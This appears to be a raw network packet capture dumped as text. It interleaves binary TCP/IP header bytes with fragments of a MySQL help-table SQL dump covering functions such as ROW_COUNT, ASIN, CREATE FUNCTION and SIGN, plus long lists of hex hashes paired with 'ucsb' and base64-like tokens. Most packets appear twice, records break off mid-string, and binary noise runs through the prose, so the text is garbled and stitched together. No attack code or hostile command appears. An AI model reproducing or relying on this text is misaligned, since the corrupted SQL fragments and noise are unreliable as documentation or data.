ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)',''),(126,'ASIN',4,' ASIN(X)\nReturns the arc sine of X, that is, the value whose sine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ASIN(0.2);\n -> 0.201358\nmysql> SELECT ASIN(\'foo\');\n -> 0.000000',''),(127,'FUNCTION',22,'A user-defined function (UDF) is a way to extend MySQL with a new\nfunction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. shared_library_name is the basename of the\nshared object file that contains the code that implements the function. The\nfile must be located in a directory that is searched by your system\'s\ndynamic linker.\n\C%ZZBi0`EL@/܂Sŀo0E4\c@? 3 Pu}U$$A )C+%bb0`BiET@/Ԁo0SE<@@w  3PJtj Ї  ){ion.\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 3 |\n+-------------+\n1 row in set (0.00 sec)\n\nmysql> DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)',''),(126,'ASIN',4,' ASIN(X)\nReturns the arc sine of X, that is, the value whose sine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ASIN(0.2);\n -> 0.201358\nmysql> SELECT ASIN(\'foo\');\n -> 0.000000',''),(127,'FUNCTION',22,'A user-defined function (UDF) is a way to extend MySQL with a new\nfunction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. shared_library_name is the basename of the\nshared object file that contains the code that implements the function. The\nfile must be located in a directory that is searched by your system\'s\ndynamic linker.\n\C<%ZZ0`BiEL@/go0AE4\c@@ 3 Pu}U$$A )C&bbBi0`ET@/,|po0E< Q@?  P2z? <6 eg0D8CC110,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
CE4B7C8C44B9EA71682D7F127C9D7490,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
D89B974DED1AB323CB026109A97D3A5A,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
0CBB815A6AA66BF9323C9F3004B9CD59,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
6B832255F9012DCDABFBDB331BC8681C,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
327F90265B5676919B9B53DB84CECCF4,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
BCE788932E937AE9EB8F06D2C2D1E50A,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
FDC1BC77E1B64F423ECB84B8C40376AD,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
49124D4DD29357F3290771F600166EED,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
9952C1455CBB37115A249569C6AB305D,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
5B48D28DA5DB95449DF8A6931F1313D3,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
0714491B873AEF0CCD657FAD2E2D2986,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
CD69FEFB9AA2E876DEAACABA69EDBE49,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
9A02AEC2030DD16F0425BE1027EEE499,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
ED7F4163FB9D364C4CC17AF89C6BFFE7,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
3CE275CE574DE28AA13A032ED59975DC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KC'bb0`BiET@/o0AE< Q@@  P2z? <6 eg0D8CC110,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
CE4B7C8C44B9EA71682D7F127C9D7490,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
D89B974DED1AB323CB026109A97D3A5A,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
0CBB815A6AA66BF9323C9F3004B9CD59,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
6B832255F9012DCDABFBDB331BC8681C,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
327F90265B5676919B9B53DB84CECCF4,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
BCE788932E937AE9EB8F06D2C2D1E50A,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
FDC1BC77E1B64F423ECB84B8C40376AD,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
49124D4DD29357F3290771F600166EED,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
9952C1455CBB37115A249569C6AB305D,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
5B48D28DA5DB95449DF8A6931F1313D3,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
0714491B873AEF0CCD657FAD2E2D2986,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
CD69FEFB9AA2E876DEAACABA69EDBE49,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
9A02AEC2030DD16F0425BE1027EEE499,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
ED7F4163FB9D364C4CC17AF89C6BFFE7,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
3CE275CE574DE28AA13A032ED59975DC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KCy'bbBi0`ET@/,|po0E< R@?  P2? g egSHhhY+xtA==
32175F1887803E0F58B54D03AABEB7BB,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
5F5DC06C47489285264EB9C3440EAF3C,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
9D9539CB6E3D0C89719A097C99AEF1E2,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
931E9E149E08DE8F2B4A93C685058423,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
53E9840F6A54E0BE3BF58BB8AE0C1BE0,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
17EE5B9F0F182EBD1430DB1B1790EA5F,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
57A225E8EACF595D475F5843C8216990,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
804819B614738F72B911D00B07A13F23,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
6F8ED8367389064C48FA35DACB37E621,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
1ff9 C2482271544962D345B796EAF004A711,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
8BEB5FDC1F44D44282C736E196BCF6E9,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
42202B8D45278D69C087DD9F3C6AC84F,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4A3078CA8C62FDD22E8A1CDA77287A6F,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
A6F1D2DBB699EE7233F9EACB9ECFC161,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
362DC20029D0BDF74405C0C440407F21,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
0801B94AC4512E83281C'bb0`BiET@/o0AE< R@@  P2? g egSHhhY+xtA==
32175F1887803E0F58B54D03AABEB7BB,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
5F5DC06C47489285264EB9C3440EAF3C,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
9D9539CB6E3D0C89719A097C99AEF1E2,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
931E9E149E08DE8F2B4A93C685058423,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
53E9840F6A54E0BE3BF58BB8AE0C1BE0,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
17EE5B9F0F182EBD1430DB1B1790EA5F,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
57A225E8EACF595D475F5843C8216990,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
804819B614738F72B911D00B07A13F23,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
6F8ED8367389064C48FA35DACB37E621,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
1ff9 C2482271544962D345B796EAF004A711,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
8BEB5FDC1F44D44282C736E196BCF6E9,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
42202B8D45278D69C087DD9F3C6AC84F,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4A3078CA8C62FDD22E8A1CDA77287A6F,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
A6F1D2DBB699EE7233F9EACB9ECFC161,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
362DC20029D0BDF74405C0C440407F21,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
0801B94AC4512E83281C'bbBi0`ET@/,|po0E< S@?  P2? 0k eg8FD1C4E5EDD41,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
DEDD60AD28D6B17D62516232D020E57F,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
4C7CE3B8CF2007883DD8E6467D99EE01,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
0F969B74802B108FCC0B8806E4F0A78D,ucsb,MTNzEwEDABZDgkRuhqwy9hUZucuCax7NEZBBDQ==
751244A2B32D69BD4E2773CD3AD54F81,ucsb,MTNzEwEDABdgK32x1NpdrR3RnNGApZthDaTbTA==
03883D733D5C1F2EB577DB0D97443083,ucsb,MTNzEwEDABh+YiBQA9h+BDsZmejFW2FldCXCuA==
8173854A1A194E2B382F4875EFA86838,ucsb,MTNzEwEDABmaG51pFL2U3f3SCQgmsFLkOmUx2w==
BED93147A6DF8F0772613C3FF7BBC708,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
81F1E1F4F68699F1AF496A9B473EC6C5,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
B32450FEE58569785E5743F923266587,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
CD51B0A0B60D2515C5242E258EA0C268,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
A0563A602CE930EE1DC4018E3B93A40A,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
FF80F8A3679C696ED0B323FEC6B0A0A6,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
3400EF5556B83A064D25FBB9E35F73A5,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
36AE9C40367C601E5D8C5C437709DEB1,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
6155FDC574EE9AB0546668C5EFA35F2A,ucsb,MTNzEwEDAAlyMAutsUCumt+UC'bb0`BiET@/o0AE< S@@  P2? 0k eg8FD1C4E5EDD41,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
DEDD60AD28D6B17D62516232D020E57F,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
4C7CE3B8CF2007883DD8E6467D99EE01,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
0F969B74802B108FCC0B8806E4F0A78D,ucsb,MTNzEwEDABZDgkRuhqwy9hUZucuCax7NEZBBDQ==
751244A2B32D69BD4E2773CD3AD54F81,ucsb,MTNzEwEDABdgK32x1NpdrR3RnNGApZthDaTbTA==
03883D733D5C1F2EB577DB0D97443083,ucsb,MTNzEwEDABh+YiBQA9h+BDsZmejFW2FldCXCuA==
8173854A1A194E2B382F4875EFA86838,ucsb,MTNzEwEDABmaG51pFL2U3f3SCQgmsFLkOmUx2w==
BED93147A6DF8F0772613C3FF7BBC708,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
81F1E1F4F68699F1AF496A9B473EC6C5,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
B32450FEE58569785E5743F923266587,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
CD51B0A0B60D2515C5242E258EA0C268,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
A0563A602CE930EE1DC4018E3B93A40A,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
FF80F8A3679C696ED0B323FEC6B0A0A6,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
3400EF5556B83A064D25FBB9E35F73A5,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
36AE9C40367C601E5D8C5C437709DEB1,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
6155FDC574EE9AB0546668C5EFA35F2A,ucsb,MTNzEwEDAAlyMAutsUCumt+UCl)bbBi0`ET@/p܂Ao0E<@?x  3POtj \  )|nTo create a function, you must have the INSERT and privilege for the\nmysql database. To drop a function, you must have the DELETE\nprivilege for the mysql database. This is because CREATE\nFUNCTION adds a row to the mysql.func system table that records the\nfunction\'s name, type, and shared library name, and DROP FUNCTION\ndeletes the function\'s row from that table. If you do not have this table,\nyou should run the mysql_fix_privilege_tables script to create it.\nSee also : [Upgrading-grant-tables].\n','CREATE [AGGREGATE] FUNCTION function_name RETURNS {STRING|INTEGER|REAL}\n SONAME shared_library_name\n\nDROP FUNCTION function_name',''),(128,'SIGN',4,' SIGN(X)\nReturns the sign of the argument as -1, 0, or 1, depending\non whether X is negative, zero, or positive.\n','mysql> SELECT SIGN(-32);\n -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1',''),(129,'SEC_TO_TIME',14,' SEC_TO_TIME(seconds)\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a value in \'HH:MM:SS\' or HHMMSS format, depending on whether\nthe function is used in a string or numeric context.\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938',''),(130,'C)bb0`BiET@/Ԁo0SE<@@w  3POtj \  )|nTo create a function, you must have the INSERT and privilege for the\nmysql database. To drop a function, you must have the DELETE\nprivilege for the mysql database. This is because CREATE\nFUNCTION adds a row to the mysql.func system table that records the\nfunction\'s name, type, and shared library name, and DROP FUNCTION\ndeletes the function\'s row from that table. If you do not have this table,\nyou should run the mysql_fix_privilege_tables script to create it.\nSee also : [Upgrading-grant-tables].\n','CREATE [AGGREGATE] FUNCTION function_name RETURNS {STRING|INTEGER|REAL}\n SONAME shared_library_name\n\nDROP FUNCTION function_name',''),(128,'SIGN',4,' SIGN(X)\nReturns the sign of the argument as -1, 0, or 1, depending\non whether X is negative, zero, or positive.\n','mysql> SELECT SIGN(-32);\n -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1',''),(129,'SEC_TO_TIME',14,' SEC_TO_TIME(seconds)\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a value in \'HH:MM:SS\' or HHMMSS format, depending on whether\nthe function is used in a string or numeric context.\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938',''),(130,'C*ZZBi0`EL@/܂Sŀo0E4\e@? 3 Pu}U4$ )ԌC*ZZ0`BiEL@/go0AE4\e@@ 3 Pu}U4$ )ԌCS-bbBi0`ET@/,|po0E< T@?~  P2?  eiSrulzGjRt8RM1g==
B8D7321DE2761FDD4E91BE5C5CE912A5,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
0396D150F8545A592C91FA3B1649B8B8,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
5422C8527C744255EBF01CB4308DFD17,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
0E85599D17F48D0D30CD85592A582F5E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
35E1EB917935F730606E28A03C8E9B25,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
339FE0B6DBA724C36D077B3D6FCBC1E5,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
E10D6B57110DE5858D5DFBAEEBAF7F20,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
917CBD1F14B226F83F3D9A10621A5949,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
2ABFD3602AB9113B47B3BE59E69FECC9,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
3D63CE66A689E83350BD5D10F1A170F3,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
92F6F252290188207BF8E9FAD42B53C2,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
00212AC6371680C8C0E57D4CA436C77A,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
8B9D3C75F78688E740662AA94E7105B1,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
822577794DE8A51573488B5AEF0C8086,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
0BF33A9B596F3C20CC52121EA755C925,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
28A60744A4A83EE2C60E5AC\-bbBi0`ET@/,|po0E< U@?}  P2? u ei11B4222560,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
15F75A10EA7A95248CD2179F0E15063E,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
006712E124D012D763C0BB8B334A5E8B,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
BF78392C2C087AED81EF18C28CCB0E2E,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
0CFE9CAC025C5405689FBEE7248E3440,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
D50E036495B79D08629F8AF5782D06DB,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
B02DDF00E1BB91672990B17181961761,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
B13800F1AD5E4668A6AFB397C9A68E4A,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4F916F8D730B6B77B2EE4CC7F5AEA617,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
2C34084884C78E3CD3766F3C769C460C,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
B256F922B56337191EA902A2A984BC83,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
9503D887D7BCFF0687E22F94DE835CBB,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
F9D2DADFEEC8EBE0C42001D6A3D1EF19,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
4861AB4480460280306E827244C67CE2,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
C8BB8D11F2E6BCF0FB8FAB6A220D3ADC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
9453006D75C615A99EBC5CC04E26758E,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZCu-bb0`BiET@/o0AE< T@@~  P2?  eiSrulzGjRt8RM1g==
B8D7321DE2761FDD4E91BE5C5CE912A5,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
0396D150F8545A592C91FA3B1649B8B8,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
5422C8527C744255EBF01CB4308DFD17,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
0E85599D17F48D0D30CD85592A582F5E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
35E1EB917935F730606E28A03C8E9B25,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
339FE0B6DBA724C36D077B3D6FCBC1E5,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
E10D6B57110DE5858D5DFBAEEBAF7F20,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
917CBD1F14B226F83F3D9A10621A5949,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
2ABFD3602AB9113B47B3BE59E69FECC9,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
3D63CE66A689E83350BD5D10F1A170F3,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
92F6F252290188207BF8E9FAD42B53C2,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
00212AC6371680C8C0E57D4CA436C77A,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
8B9D3C75F78688E740662AA94E7105B1,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
822577794DE8A51573488B5AEF0C8086,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
0BF33A9B596F3C20CC52121EA755C925,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
28A60744A4A83EE2C60E5AC-bb0`BiET@/o0AE< U@@}  P2? u ei11B4222560,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
15F75A10EA7A95248CD2179F0E15063E,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
006712E124D012D763C0BB8B334A5E8B,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
BF78392C2C087AED81EF18C28CCB0E2E,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
0CFE9CAC025C5405689FBEE7248E3440,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
D50E036495B79D08629F8AF5782D06DB,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
B02DDF00E1BB91672990B17181961761,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
B13800F1AD5E4668A6AFB397C9A68E4A,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4F916F8D730B6B77B2EE4CC7F5AEA617,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
2C34084884C78E3CD3766F3C769C460C,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
B256F922B56337191EA902A2A984BC83,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
9503D887D7BCFF0687E22F94DE835CBB,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
F9D2DADFEEC8EBE0C42001D6A3D1EF19,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
4861AB4480460280306E827244C67CE2,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
C8BB8D11F2E6BCF0FB8FAB6A220D3ADC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
9453006D75C615A99EBC5CC04E26758E,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZC-bbBi0`ET@/,|po0E< V@?|  P2 ?  eix6p349kTSmA==
B53725F9F884CBEE7D14F0BE73DCC55E,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
368F06655B66AF9DB66DC274ACBFB2E1,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
43CA2ADC7035F3AA71ED59D935FB51FE,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
1F54ED7EFE5CB578AAA18DC418B0F94D,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
E7061704A832C57BDC5562F29E87F7F9,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
02BE51661CAA99083AAB2E832E6304A9,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
DA02D889F0128C698EB10B94D77CFEFF,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
D84A0CF5666E83BC1E198ACDB50C9E09,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
3DC76FC7883B7160D144F0B8F336B30E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
1CC59D2ADB41D5567925D512309743D6,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
32F09BA8D5B35A88703B5E21A02B1D82,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4AD574B0F59CFDF6FD9F38B93084DE6E,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
C081E62A15F25F5A66E467CE3AEFF244,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
8459C90054F6D8260AF485628B90BBFB,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
20C515431E873AC4C2AE74962CD959B4,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
0C0036C4D7ECBFDD71BB99D0CC-bb0`BiET@/o0AE< V@@|  P2 ?  eix6p349kTSmA==
B53725F9F884CBEE7D14F0BE73DCC55E,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
368F06655B66AF9DB66DC274ACBFB2E1,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
43CA2ADC7035F3AA71ED59D935FB51FE,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
1F54ED7EFE5CB578AAA18DC418B0F94D,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
E7061704A832C57BDC5562F29E87F7F9,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
02BE51661CAA99083AAB2E832E6304A9,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
DA02D889F0128C698EB10B94D77CFEFF,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
D84A0CF5666E83BC1E198ACDB50C9E09,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
3DC76FC7883B7160D144F0B8F336B30E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
1CC59D2ADB41D5567925D512309743D6,ucsb,MTNzEwEDAA48365aMUYKp2rjrt+lftffWpjyzA==
32F09BA8D5B35A88703B5E21A02B1D82,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4AD574B0F59CFDF6FD9F38B93084DE6E,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
C081E62A15F25F5A66E467CE3AEFF244,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
8459C90054F6D8260AF485628B90BBFB,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
